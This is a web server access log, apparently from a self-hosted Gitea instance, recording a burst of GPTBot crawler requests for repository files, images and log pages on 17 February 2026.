74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png?display=rendered" [Client 74.7.227.38] [Length 10861] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" +[17/Feb/2026:15:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" +[17/Feb/2026:15:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fProgram.cs" [Client 74.7.227.38] [Length 28666] [Gzip 6.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" +[17/Feb/2026:15:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fobj" [Client 74.7.227.38] [Length 28260] [Gzip 6.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" +[17/Feb/2026:15:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 9807] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico" +[17/Feb/2026:15:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:41:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12898] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:41:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10242] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 9794] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore?display=source" [Client 74.7.227.38] [Length 12193] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" +[17/Feb/2026:15:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md?display=rendered" [Client 74.7.227.38] [Length 13345] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" +[17/Feb/2026:15:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker?display=rendered" [Client 74.7.227.38] [Length 16017] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:15:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" +[17/Feb/2026:15:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" +[17/Feb/2026:15:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore?display=source" [Client 74.7.227.38] [Length 12221] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" +[17/Feb/2026:15:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md?display=source" [Client 74.7.227.38] [Length 15343] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" +[17/Feb/2026:15:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md?display=rendered" [Client 74.7.227.38] [Length 13412] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" +[17/Feb/2026:15:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker?display=rendered" [Client 74.7.227.38] [Length 16001] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:15:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 11083] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:15:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 11077] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:15:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 15161] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:15:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md?display=rendered" [Client 74.7.227.38] [Length 13313] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" +[17/Feb/2026:15:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 47757] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 20545] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:15:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 17886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 14466] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:15:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 15042] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:15:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 20895] [Gzip 7.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:15:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 40912] [Gzip 9.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:15:42:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/reactor.png" +[17/Feb/2026:15:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/reactor.png" +[17/Feb/2026:15:42:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" +[17/Feb/2026:15:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/bearing.png" +[17/Feb/2026:15:42:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" +[17/Feb/2026:15:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/bearing.png" +[17/Feb/2026:15:42:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/reactor.png" +[17/Feb/2026:15:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/reactor.png" +[17/Feb/2026:15:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/reactor.png?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/reactor.png" +[17/Feb/2026:15:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/bearing.png?display=rendered" [Client 74.7.227.38] [Length 11071] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" +[17/Feb/2026:15:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 938] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/reactor.png" +[17/Feb/2026:15:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 10147] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 14748] [Gzip 6.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 10520] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 55707] [Gzip 15.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 10703] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 25395] [Gzip 11.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:42:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" +[17/Feb/2026:15:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/reactor.png" +[17/Feb/2026:15:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 938] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" +[17/Feb/2026:15:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 20146] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 74625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 170071] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs?display=source" [Client 74.7.227.38] [Length 13938] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 